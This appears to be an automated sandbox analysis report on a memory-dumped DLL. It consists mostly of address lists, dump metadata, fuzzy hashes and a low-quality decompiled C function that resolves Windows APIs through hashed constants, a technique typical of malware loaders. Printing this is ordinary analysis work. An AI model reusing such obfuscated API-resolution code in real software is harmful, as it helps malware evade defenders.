0x6ea0c804
0x6ea0c807
0x6ea0c80a
0x00000000
0x00000000
0x6ea0c810
0x6ea0c815
0x6ea0c817
0x00000000
0x00000000
0x00000000
0x6ea0c817
0x6ea0c8c8
0x6ea0c8cc
0x6ea0c8cf
0x6ea0c8d1
0x00000000
0x00000000
0x6ea0c8d9
0x6ea0c8dc
0x6ea0c8e6
0x6ea0c8ec
0x6ea0c8ee
0x6ea0c8f2
0x6ea0c8f6
0x6ea0c8fa
0x6ea0c90a
0x6ea0c90a
0x6ea0c90a
0x6ea0c90c
0x6ea0c90e
0x00000000
0x00000000
0x6ea0c910
0x6ea0c912
0x6ea0c914
0x6ea0c98b
0x6ea0c98b
0x6ea0c98f
0x6ea0c993
0x6ea0c997
0x6ea0c999
0x00000000
0x00000000
0x6ea0c99f
0x6ea0c9a0
0x6ea0c9a6
0x00000000
0x00000000
0x6ea0c9a8
0x6ea0c9ac
0x6ea0c9b0
0x6ea0c9b0
0x6ea0c9b5
0x6ea0c9b5
0x6ea0c9b8
0x6ea0c9b8
0x6ea0c9ba
0x6ea0c9be
0x6ea0c9c2
0x6ea0c9c2
0x6ea0c9ca
0x6ea0c9cd
0x6ea0c9d1
0x6ea0c9d4
0x6ea0c9d7
0x6ea0c9da
0x6ea0c9e0
0x6ea0c9e6
0x6ea0c9e9
0x6ea0c9ec
0x00000000
0x00000000
0x6ea0c9f8
0x6ea0c9fa
0x6ea0ca02
0x6ea0ca02
0x6ea0ca06
0x6ea0ca0a
0x6ea0ca0e
0x6ea0ca12
0x6ea0ca12
0x6ea0ca14
0x00000000
0x00000000
0x6ea0ca1a
0x6ea0ca1e
0x6ea0ca22
0x6ea0ca26
0x6ea0ca26
0x6ea0ca28
0x6ea0ca28
0x6ea0ca2a
0x6ea0ca2c
0x6ea0ca2c
0x6ea0ca2f
0x00000000
0x00000000
0x6ea0ca39
0x6ea0ca3b
0x00000000
0x00000000
0x6ea0ca41
0x6ea0ca44
0x6ea0ca46
0x6ea0ca4a
0x6ea0ca4a
0x6ea0ca50
0x6ea0ca53
0x6ea0ca59
0x6ea0ca5c
0x6ea0ca67
0x6ea0ca6a
0x6ea0ca6d
0x00000000
0x00000000
0x6ea0ca77
0x6ea0ca79
0x00000000
0x00000000
0x6ea0ca7b
0x6ea0ca7b
0x6ea0ca7f
0x6ea0ca83
0x6ea0ca87
0x6ea0ca8b
0x6ea0ca8b
0x6ea0ca8d
0x6ea0caa8
0x6ea0cab4
0x6ea0cab4
0x6ea0caba
0x6ea0caba
0x6ea0cabf
0x6ea0cac3
0x6ea0cac7
0x6ea0cac9
0x00000000
0x00000000
0x6ea0cacf
0x6ea0cad2
0x6ea0cad4
0x00000000
0x00000000
0x6ea0cad6
0x6ea0cadc
0x6ea0caef
0x6ea0caef
0x6ea0caf4
0x6ea0caf6
0x6ea0caf6
0x6ea0caf9
0x6ea0cb15
0x6ea0cb21
0x6ea0cb21
0x6ea0cb27
0x6ea0cb27
0x6ea0cb2c
0x6ea0cb30
0x6ea0cb34
0x6ea0cb36
0x00000000
0x00000000
0x6ea0cb3c
0x6ea0cb3f
0x6ea0cb41
0x00000000
0x00000000
0x6ea0cb43
0x6ea0cb49
0x6ea0cb5c
0x6ea0cb5c
0x6ea0cb61
0x6ea0cb66
0x6ea0cb6e
0x6ea0cb70
0x6ea0cb72
0x6ea0cb74
0x6ea0cb77
0x6ea0cb79
0x6ea0cb7c
0x6ea0cb7f
0x6ea0cb81
0x6ea0cb84
0x6ea0cb86
0x6ea0ccdc
0x6ea0ccdc
0x6ea0cce6
0x6ea0cce8
0x6ea0ccee
0x6ea0ccf0
0x6ea0ccf2
0x6ea0cd31
0x00000000
0x6ea0cd31
0x6ea0ccf4
0x6ea0ccf6
0x6ea0cd1f
0x6ea0cd1f
0x6ea0cd21
0x6ea0cd22
0x6ea0cd27
0x00000000
0x6ea0cd27
0x6ea0ccf8
0x6ea0ccfb
0x6ea0ccfe
0x6ea0cd00
0x00000000
0x00000000
0x6ea0cd02
0x6ea0cd02
0x6ea0cd04
0x6ea0cd04
0x6ea0cd05
0x6ea0cd0a
0x6ea0cd0f
0x6ea0cd11
0x00000000
0x00000000
0x6ea0cd13
0x6ea0cd17
0x6ea0cd1b
0x6ea0cd1d
0x00000000
0x00000000
0x00000000
0x6ea0cd1d
0x00000000
0x6ea0cd04
0x6ea0cb8c
0x6ea0cb8f
0x6ea0cb91
0x00000000
0x00000000
0x6ea0cb97
0x6ea0cb99
0x6ea0cc09
0x6ea0cc0e
0x6ea0cc0e
0x6ea0cc11
0x6ea0cc14
0x6ea0cc17
0x6ea0cc19
0x6ea0cc2c
0x6ea0cc2f
0x6ea0cc2f
0x6ea0cc35
0x6ea0cc3d
0x6ea0cc3d
0x6ea0cc3d
0x6ea0cc3e
0x6ea0cc48
0x6ea0cc52
0x6ea0cc55
0x6ea0cc5b
0x6ea0cc5d
0x6ea0cc63
0x6ea0cc65
0x6ea0cc67
0x6ea0cca1
0x6ea0cca3
0x00000000
0x6ea0cc69
0x6ea0cc69
0x6ea0cc6b
0x6ea0cc94
0x6ea0cc94
0x6ea0cc96
0x6ea0cc97
0x6ea0cc9c
0x6ea0cca6
0x6ea0cca6
0x6ea0ccac
0x6ea0ccaf
0x6ea0ccb1
0x6ea0ccb1
0x6ea0ccb3
0x00000000
0x00000000
0x6ea0ccb9
0x6ea0ccc3
0x6ea0ccc3
0x6ea0ccc6
0x6ea0ccc7
0x6ea0ccca
0x6ea0cccc
0x00000000
0x00000000
0x6ea0ccce
0x6ea0ccd0
0x6ea0cd3b
0x00000000
0x6ea0cd3b
0x6ea0ccd2
0x6ea0ccd2
0x6ea0ccd4
0x00000000
0x00000000
0x6ea0ccbd
0x6ea0ccc0
0x6ea0ccc0
0x6ea0ccc0
0x6ea0ccc3
0x6ea0cc6d
0x6ea0cc70
0x6ea0cc73
0x6ea0cc75
0x00000000
0x00000000
0x6ea0cc77
0x6ea0cc77
0x6ea0cc79
0x6ea0cc79
0x6ea0cc7a
0x6ea0cc7f
0x6ea0cc84
0x6ea0cc86
0x00000000
0x00000000
0x6ea0cc88
0x6ea0cc8c
0x6ea0cc90
0x6ea0cc92
0x00000000
0x00000000
0x00000000
0x6ea0cc92
0x00000000
0x6ea0cc79
0x6ea0cc67
0x6ea0cc1b
0x00000000
0x6ea0cc1b
0x6ea0cb9d
0x6ea0cb9d
0x6ea0cba0
0x6ea0cbbd
0x6ea0cbc9
0x6ea0cbc9
0x6ea0cbcf
0x6ea0cbcf
0x6ea0cbd4
0x6ea0cbd8
0x6ea0cbdc
0x6ea0cbde
0x00000000
0x00000000
0x6ea0cbe4
0x6ea0cbe7
0x6ea0cbe9
0x00000000
0x00000000
0x6ea0cbeb
0x6ea0cbf1
0x6ea0cc04
0x6ea0cc04
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0cbf3
0x6ea0cbf3
0x6ea0cbf7
0x6ea0cbf9
0x00000000
0x00000000
0x6ea0cbfb
0x6ea0cbfc
0x6ea0cc02
0x00000000
0x00000000
0x00000000
0x6ea0cc02
0x00000000
0x6ea0cbf3
0x6ea0cd6b
0x6ea0cd70
0x00000000
0x6ea0cd70
0x6ea0cba2
0x6ea0cba4
0x6ea0cba7
0x00000000
0x00000000
0x6ea0cbae
0x6ea0cbae
0x6ea0cbb0
0x6ea0cbb0
0x6ea0cbb4
0x6ea0cbb6
0x00000000
0x00000000
0x6ea0cbb8
0x6ea0cbb9
0x6ea0cbbb
0x00000000
0x00000000
0x00000000
0x6ea0cbbb
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0cb4b
0x6ea0cb4b
0x6ea0cb4f
0x6ea0cb51
0x00000000
0x00000000
0x6ea0cb53
0x6ea0cb54
0x6ea0cb5a
0x00000000
0x00000000
0x00000000
0x6ea0cb5a
0x00000000
0x6ea0cb4b
0x6ea0cd77
0x6ea0cd7c
0x00000000
0x6ea0cd7c
0x6ea0cafb
0x6ea0cafd
0x6ea0caff
0x00000000
0x00000000
0x6ea0cb06
0x6ea0cb06
0x6ea0cb08
0x6ea0cb08
0x6ea0cb0c
0x6ea0cb0e
0x00000000
0x00000000
0x6ea0cb10
0x6ea0cb11
0x6ea0cb13
0x00000000
0x00000000
0x00000000
0x6ea0cb13
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0cade
0x6ea0cade
0x6ea0cae2
0x6ea0cae4
0x00000000
0x00000000
0x6ea0cae6
0x6ea0cae7
0x6ea0caed
0x00000000
0x00000000
0x00000000
0x6ea0caed
0x00000000
0x6ea0cade
0x6ea0cd83
0x6ea0cd88
0x00000000
0x6ea0cd88
0x6ea0ca8f
0x6ea0ca91
0x6ea0ca93
0x00000000
0x00000000
0x6ea0ca95
0x6ea0ca99
0x6ea0ca9b
0x6ea0ca9b
0x6ea0ca9f
0x6ea0caa1
0x00000000
0x00000000
0x6ea0caa3
0x6ea0caa4
0x6ea0caa6
0x00000000
0x00000000
0x00000000
0x6ea0caa6
0x00000000
0x6ea0ca9b
0x6ea0cd8f
0x6ea0cd93
0x6ea0cd97
0x6ea0cd9b
0x6ea0cdad
0x6ea0cdad
0x6ea0cdaf
0x6ea0cdb1
0x00000000
0x00000000
0x6ea0cdb3
0x6ea0cdb3
0x6ea0cdb5
0x6ea0cdb7
0x6ea0ce2e
0x6ea0ce2e
0x6ea0ce32
0x6ea0ce36
0x6ea0ce3a
0x6ea0ce3c
0x00000000
0x00000000
0x6ea0ce42
0x6ea0ce43
0x6ea0ce49
0x00000000
0x00000000
0x6ea0ce4b
0x6ea0ce4f
0x6ea0ce53
0x6ea0ce53
0x6ea0ce58
0x6ea0ce58
0x6ea0ce5c
0x6ea0ce5c
0x6ea0ce5e
0x6ea0ce62
0x6ea0ce66
0x6ea0ce66
0x6ea0ce6e
0x6ea0ce71
0x6ea0ce75
0x6ea0ce78
0x6ea0ce7b
0x6ea0ce7e
0x6ea0ce84
0x6ea0ce8a
0x6ea0ce8d
0x6ea0ce90
0x00000000
0x00000000
0x6ea0ce94
0x6ea0ce96
0x6ea0cea2
0x6ea0cea2
0x6ea0cea5
0x6ea0cea5
0x6ea0cea7
0x6ea0ceab
0x6ea0ceab
0x6ea0cead
0x00000000
0x00000000
0x00000000
0x6ea0cead
0x6ea0ce98
0x6ea0ce99
0x6ea0ce9d
0x00000000
0x00000000
0x00000000
0x6ea0ce9d
0x6ea0ceec
0x6ea0cef4
0x6ea0cefa
0x6ea0cefa
0x6ea0cefd
0x6ea0cf4b
0x6ea0cf4b
0x6ea0cf4f
0x00000000
0x6ea0cf4f
0x6ea0cf03
0x6ea0cf05
0x00000000
0x00000000
0x6ea0cf07
0x6ea0cf0b
0x6ea0cf0b
0x6ea0cf0d
0x6ea0cf11
0x6ea0cf15
0x6ea0cf15
0x6ea0cf1f
0x6ea0cf22
0x6ea0cf28
0x6ea0cf32
0x6ea0cf35
0x6ea0cf38
0x00000000
0x00000000
0x6ea0cf42
0x6ea0cf44
0x00000000
0x00000000
0x00000000
0x6ea0cf46
0x6ea0cda1
0x6ea0cda5
0x6ea0cda9
0x6ea0cdad
0x6ea0cdaf
0x6ea0cdb1
0x00000000
0x00000000
0x00000000
0x6ea0cdb1
0x6ea0cf58
0x6ea0cf5c
0x6ea0ced3
0x6ea0ced3
0x6ea0ced5
0x00000000
0x00000000
0x6ea0cedb
0x00000000
0x00000000
0x6ea0cee1
0x6ea0cee5
0x6ea0cee7
0x00000000
0x6ea0cee7
0x6ea0cdb9
0x6ea0cdbd
0x6ea0cdbf
0x6ea0cdc3
0x6ea0cdc7
0x6ea0cdcb
0x6ea0cdcd
0x00000000
0x00000000
0x6ea0cdd3
0x6ea0cdd4
0x6ea0cdd6
0x00000000
0x00000000
0x6ea0cdd8
0x6ea0cddc
0x6ea0cde0
0x00000000
0x6ea0cde0
0x6ea0cec7
0x6ea0cecb
0x6ea0cecf
0x00000000
0x6ea0cde4
0x6ea0cdf0
0x6ea0cdf4
0x6ea0cdf4
0x6ea0cdfa
0x6ea0cdfe
0x6ea0cdfe
0x6ea0ce03
0x6ea0ce07
0x6ea0ce0b
0x6ea0ce0d
0x00000000
0x00000000
0x6ea0ce13
0x6ea0ce16
0x6ea0ce18
0x00000000
0x00000000
0x6ea0ce1a
0x6ea0ce22
0x6ea0ce26
0x6ea0ce2c
0x00000000
0x00000000
0x00000000
0x6ea0ce2c
0x6ea0cf67
0x6ea0cf6c
0x6ea0cf70
0x6ea0cf76
0x00000000
0x6ea0cf76
0x6ea0cdad
0x6ea0ceb3
0x6ea0ceb3
0x6ea0ceb6
0x6ea0ceba
0x6ea0cebe
0x00000000
0x6ea0cebe
0x6ea0c9fc
0x6ea0c9fd
0x6ea0ca00
0x00000000
0x00000000
0x00000000
0x6ea0ca00
0x6ea0cf7f
0x6ea0cf87
0x6ea0cf8d
0x6ea0cf8d
0x6ea0cf90
0x00000000
0x00000000
0x6ea0cf9a
0x6ea0cf9c
0x00000000
0x00000000
0x6ea0cfa2
0x6ea0cfa6
0x6ea0cfa6
0x6ea0cfa8
0x6ea0cfac
0x6ea0cfb0
0x6ea0cfb0
0x6ea0cfba
0x6ea0cfbd
0x6ea0cfc3
0x6ea0cfcd
0x6ea0cfd0
0x6ea0cfd3
0x00000000
0x00000000
0x6ea0cfdd
0x6ea0cfdf
0x00000000
0x00000000
0x00000000
0x6ea0cfe1
0x6ea0c8fe
0x6ea0c902
0x6ea0c906
0x00000000
0x6ea0c906
0x6ea0cfe6
0x6ea0cfea
0x6ea0cd50
0x6ea0cd50
0x6ea0cd52
0x00000000
0x00000000
0x6ea0cd58
0x00000000
0x00000000
0x6ea0cd5e
0x6ea0cd62
0x00000000
0x6ea0cd62
0x6ea0c916
0x6ea0c91a
0x6ea0c91c
0x6ea0c920
0x6ea0c924
0x6ea0c928
0x6ea0c92a
0x00000000
0x00000000
0x6ea0c930
0x6ea0c931
0x6ea0c933
0x00000000
0x00000000
0x6ea0c935
0x6ea0c939
0x6ea0c93d
0x00000000
0x6ea0c93d
0x6ea0cd44
0x6ea0cd48
0x6ea0cd4c
0x00000000
0x6ea0c941
0x6ea0c94d
0x6ea0c951
0x6ea0c951
0x6ea0c957
0x6ea0c95b
0x6ea0c95b
0x6ea0c960
0x6ea0c964
0x6ea0c968
0x6ea0c96a
0x00000000
0x00000000
0x6ea0c970
0x6ea0c973
0x6ea0c975
0x00000000
0x00000000
0x6ea0c977
0x6ea0c97f
0x6ea0c983
0x6ea0c989
0x00000000
0x00000000
0x00000000
0x6ea0c989
0x6ea0cff5
0x6ea0cffa
0x6ea0cffe
0x6ea0d004
0x00000000
0x6ea0d004
0x6ea0c90a
0x00000000
0x6ea0c768
0x6ea0c704
0x6ea0c707
0x6ea0c70a
0x6ea0c70c
0x00000000
0x00000000
0x6ea0c70e
0x6ea0c70e
0x6ea0c710
0x6ea0c710
0x6ea0c711
0x6ea0c716
0x6ea0c71b
0x6ea0c71d
0x00000000
0x00000000
0x6ea0c71f
0x6ea0c723
0x6ea0c727
0x6ea0c729
0x00000000
0x00000000
0x00000000
0x6ea0c729
0x00000000
0x6ea0c710
0x6ea0c6fe
0x6ea0c6b1
0x00000000
0x6ea0c6b1
0x6ea0c623
0x6ea0c623
0x6ea0c626
0x6ea0c646
0x6ea0c64a
0x6ea0c656
0x6ea0c656
0x6ea0c65c
0x6ea0c65c
0x6ea0c661
0x6ea0c665
0x6ea0c669
0x6ea0c66b
0x00000000
0x00000000
0x6ea0c671
0x6ea0c674
0x6ea0c676
0x00000000
0x00000000
0x6ea0c678
0x6ea0c67e
0x6ea0c695
0x6ea0c695
0x6ea0c69a
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0c680
0x6ea0c680
0x6ea0c684
0x6ea0c686
0x00000000
0x00000000
0x6ea0c68c
0x6ea0c68d
0x6ea0c693
0x00000000
0x00000000
0x00000000
0x6ea0c693
0x6ea0c8ab
0x6ea0c8ab
0x6ea0c8ae
0x6ea0c8be
0x6ea0c8b0
0x6ea0c8b2
0x6ea0c8b5
0x6ea0c8b5
0x00000000
0x6ea0c8ae
0x6ea0d00d
0x6ea0d012
0x00000000
0x6ea0d012
0x6ea0c628
0x6ea0c62a
0x6ea0c62c
0x00000000
0x00000000
0x6ea0c633
0x6ea0c633
0x6ea0c635
0x6ea0c635
0x6ea0c639
0x6ea0c63b
0x00000000
0x00000000
0x6ea0c641
0x6ea0c642
0x6ea0c644
0x00000000
0x00000000
0x00000000
0x6ea0c644
0x00000000
0x6ea0c635
0x6ea0c610
0x00000000
0x6ea0c610
0x6ea0c5c1
0x6ea0c5ea
0x6ea0c5ea
0x6ea0c5ec
0x6ea0c5ed
0x6ea0c5f2
0x00000000
0x6ea0c5f2
0x6ea0c5c3
0x6ea0c5c6
0x6ea0c5cb
0x00000000
0x00000000
0x6ea0c5cf
0x6ea0c5cf
0x6ea0c5d0
0x6ea0c5d5
0x6ea0c5dc
0x00000000
0x00000000
0x6ea0c5de
0x6ea0c5e2
0x6ea0c5e8
0x00000000
0x00000000
0x00000000
0x6ea0c5e8
0x00000000

Strings

@, xrefs: 6EA0C600

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: 61ce7075af99a033c412b124b626cf8ddc07abfaf0a37f15d1494413505c36a0
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: F5621B756047128BD300CFADD49022AB3E2BFC9718F29872DE8959B394E734DD81C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F1784, Relevance: 2.1, Strings: 1, Instructions: 877
COMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

			E6E9F1784(intOrPtr* __ecx, void* __ebp, intOrPtr _a4, void* _a876, void* _a900, void* _a904, void* _a984, void* _a988, void* _a992, void* _a996, void* _a1000, void* _a1004, intOrPtr _a1008, intOrPtr _a1012, intOrPtr _a1016, intOrPtr _a1020, intOrPtr _a1024, intOrPtr _a1028, intOrPtr _a1032, intOrPtr _a1036, intOrPtr _a1040, intOrPtr _a1044, intOrPtr _a1048, intOrPtr _a1052, intOrPtr _a1056, intOrPtr _a1060, void* _a1152, char _a1176, char _a1184, char _a1212, void* _a2140, void* _a2144, void* _a2148, void* _a2152, void* _a2156, void* _a2168, void* _a2172, void* _a2176, void* _a2180, void* _a2184, void* _a2188, void* _a2192, void* _a2196, void* _a2200, void* _a2212, intOrPtr _a2216, void* _a2220, void* _a2224, void* _a2228, void* _a2232, char _a2236, char _a2240, char _a2244, char _a2248, char _a2252, char _a2256, char _a2260, char _a2264, char _a2268, char _a2272, char _a2276, char _a2280, char _a2284, char _a2288, char _a2292, char _a2296, char _a2300, char _a2304, char _a2308, char _a2312, char _a2316, char _a2320, char _a2324, char _a2328, char _a2332, char _a2336, char _a2340, char _a2344, char _a2348, char _a2352, char _a2356, char _a2360, char _a2364, char _a2368, char _a2372, char _a2376, char _a2380, char _a2384, char _a2388, char _a2392, char _a2396, char _a2400, char _a2404, char _a2408, char _a2412, char _a2416, char _a2424, char _a2432, char _a2440, char _a2448, char _a2464, char _a2468, void* _a2472, void* _a2476, intOrPtr _a2480, intOrPtr _a2488, signed int _a2492, intOrPtr _a2512, char _a2540, char _a2560, char _a2568, void* _a2572, char _a2576, char _a2580, char _a2588, char _a2592, void* _a2616, void* _a2620, void* _a2640, void* _a2644, char _a2648, char _a2652, signed int _a2656, intOrPtr _a2680, char _a2684, void* _a2692, void* _a2696, void* _a2708) {
				void* _v0;
				intOrPtr _v4;
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				signed int _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				void* _v116;
				void* _v124;
				void* _v132;
				void* _v160;
				void* _v184;
				void* _v188;
				void* _v192;
				void* _v196;
				void* _v200;
				void* _v204;
				void* _v216;
				void* _v224;
				void* _v232;
				void* _v240;
				void* _v260;
				void* _v264;
				void* _v276;
				void* __edi;
				void* _t279;
				intOrPtr _t302;
				signed int _t304;
				signed int _t313;
				signed int _t317;
				signed int _t321;
				signed int _t496;
				signed int _t505;
				signed int _t519;
				signed int _t520;
				signed int _t523;
				signed int _t527;
				signed int _t531;
				signed int _t702;
				void* _t707;
				signed int _t712;
				intOrPtr _t715;
				intOrPtr _t716;
				void* _t722;
				void* _t725;
				void* _t726;
				void* _t727;
				void* _t730;

				_t722 = __ebp;
				_t687 =  &_a1212;
				_push(2);
				_push(0);
				_push(0);
				_push( &_a1212);
				_push(_t702);
				_push(_a2680);
				_push(0xffffffff);
				 *__ecx();
				if(0 == 0) {
					_a2684 = _a1184;
					_t531 = L6EA015C0(0x588ab3ea, 0xea812079);
					__eflags = _t531;
					if(_t531 == 0) {
						L12:
						 *((intOrPtr*)(_t725 + 0xa9c)) = _a1184;
						__eflags = _a2656;
						if(_a2656 != 0) {
							E6EA1BE30( &_a2652, _t707);
						}
						__eflags = L6EA1ED90(_t523) - 0x20;
						_push(0);
						_t270 =  ==  ? 0x6ea28600 : 0x6ea28c40;
						_push( ==  ? 0x6ea28600 : 0x6ea28c40);
						E6EA01BA0(L6EA1ED90(_t523) - 0x20, _t725 + 0xac0);
						E6EA19B10(_t725 + 0xa44);
						E6EA10B10(_t725 + 0xab8);
						E6EA19670(_t725 + 0xa54, E6EA19A90( &_a2580, _t707));
						 *((intOrPtr*)(_t725 + 0x40)) = E6EA19640( &_a2576, 0);
						E6E9FAC20(_t722,  *((intOrPtr*)(_t725 + 0x44)), E6EA19640( &_a2588, 0),  *((intOrPtr*)(_t725 + 0xab8)));
						_t726 = _t725 + 8;
						_t279 = L6EA1ED90(_t523);
						__eflags = _t279 - 0x20;
						if(_t279 == 0x20) {
							E6EA00B70(_t726 + 0x40, 0, 0x47c);
							_t727 = _t726 + 0xc;
							_a1060 = E6EA19650(_t707);
							_a1052 = 0x56473829;
							 *((intOrPtr*)(_t727 + 0x46c)) = L6EA015C0(0x588ab3ea, 0x9cac62c7);
							 *((intOrPtr*)(_t727 + 0x470)) = L6EA015C0(0x588ab3ea, 0xa8f2638d);
							 *((intOrPtr*)(_t727 + 0x474)) = L6EA015C0(0x588ab3ea, 0xd8cc7390);
							 *((intOrPtr*)(_t727 + 0x478)) = L6EA015C0(0x588ab3ea, 0xd16c9225);
							 *((intOrPtr*)(_t727 + 0x47c)) = L6EA015C0(0x588ab3ea, 0x649746ec);
							 *((intOrPtr*)(_t727 + 0x480)) = L6EA015C0(0x588ab3ea, 0xe5ef1afa);
							_a1060 = L6EA015C0(0x588ab3ea, 0x58d59bc9);
							_a1056 = L6EA015C0(0x588ab3ea, 0x35b39b2b);
							_a1052 = L6EA015C0(0x588ab3ea, 0xe9fbf3a8);
							_a1048 = L6EA015C0(0x588ab3ea, 0xbcd9ca71);
							_a1044 = L6EA015C0(0x588ab3ea, 0x4faea65b);
							_a1040 = L6EA015C0(0x588ab3ea, 0xc0b67de0);
							_a1036 = L6EA015C0(0x588ab3ea, 0x996e050f);
							_a1032 = L6EA015C0(0x588ab3ea, 0x81c9e4a7);
							_a1028 = L6EA015C0(0x588ab3ea, 0x97abe05f);
							_a1024 = L6EA015C0(0x588ab3ea, 0x82d274c4);
							_a1020 = L6EA015C0(0xa1310f65, 0x77be1f6);
							_a1016 = L6EA015C0(0xa1310f65, 0xe2d27ff4);
							_a1012 = L6EA015C0(0xa1310f65, 0x69121530);
							_t302 = L6EA015C0(0xa1310f65, 0xf1c64384);
							 *(_t727 + 0x464) =  *(_t727 + 0xa9c);
							_a1008 = _t302;
							 *((intOrPtr*)(_t727 + 0x468)) = _a2512;
							E6EA19710(_t727 + 0xa68, _t727 + 0x44, 0x47c);
							_push( &_a2448);
							_push(0x4bc);
							_t689 =  &_a2432;
							_t304 = L6E9FE900(_t523,  &_a2432);
						} else {
							E6EA00B70( &_a1176, 0, 0x4f0);
							_t730 = _t726 + 0xc;
							_a2216 = E6EA19650(_t707);
							 *((intOrPtr*)( &_a2440 - 0xe8)) = 0x56473829;
							_push(0);
							E6EA19350( &_a2440);
							 *((intOrPtr*)(_t730 + 0x40)) = 0x3b4caff7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x48], xmm0");
							E6EA19670(_t730 + 0x9b4, E6EA19650(_t730 + 0x9b0) + 0x10);
							E6EA19640( &_a2432, E6EA19650( &_a2432) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t730 + 0x40)) = 0x9cac62c7;
							asm("movq [esp+0x48], xmm1");
							E6EA19670(_t730 + 0x9b4, E6EA19650(_t730 + 0x9b0) + 0x10);
							E6EA19640( &_a2424, E6EA19650( &_a2424) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_a4 = 0xa8f2638d;
							asm("movq [esp+0x48], xmm1");
							E6EA19670(_t730 + 0x9b4, E6EA19650(_t730 + 0x9b0) + 0x10);
							E6EA19640( &_a2416, E6EA19650( &_a2416) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v4 = 0xd8cc7390;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2412, E6EA19650( &_a2412) + 0x10);
							E6EA19640( &_a2408, E6EA19650( &_a2408) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v12 = 0xd16c9225;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2404, E6EA19650( &_a2404) + 0x10);
							E6EA19640( &_a2400, E6EA19650( &_a2400) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v20 = 0x649746ec;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2396, E6EA19650( &_a2396) + 0x10);
							E6EA19640( &_a2392, E6EA19650( &_a2392) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v28 = 0xe5ef1afa;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2388, E6EA19650( &_a2388) + 0x10);
							E6EA19640( &_a2384, E6EA19650( &_a2384) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v36 = 0x58d59bc9;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2380, E6EA19650( &_a2380) + 0x10);
							E6EA19640( &_a2376, E6EA19650( &_a2376) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v44 = 0x35b39b2b;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2372, E6EA19650( &_a2372) + 0x10);
							E6EA19640( &_a2368, E6EA19650( &_a2368) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v52 = 0xe9fbf3a8;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2364, E6EA19650( &_a2364) + 0x10);
							E6EA19640( &_a2360, E6EA19650( &_a2360) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v60 = 0xbcd9ca71;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2356, E6EA19650( &_a2356) + 0x10);
							E6EA19640( &_a2352, E6EA19650( &_a2352) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v68 = 0x4faea65b;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2348, E6EA19650( &_a2348) + 0x10);
							E6EA19640( &_a2344, E6EA19650( &_a2344) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v76 = 0xc0b67de0;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2340, E6EA19650( &_a2340) + 0x10);
							E6EA19640( &_a2336, E6EA19650( &_a2336) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v84 = 0x996e050f;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2332, E6EA19650( &_a2332) + 0x10);
							E6EA19640( &_a2328, E6EA19650( &_a2328) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v92 = 0x81c9e4a7;
							asm("movq [esp+0x48], xmm1");
							E6EA19670( &_a2324, E6EA19650( &_a2324) + 0x10);
							E6EA19640( &_a2320, E6EA19650( &_a2320) + 0xfffffff0);
							asm("movups xmm0, [esp+0x40]");
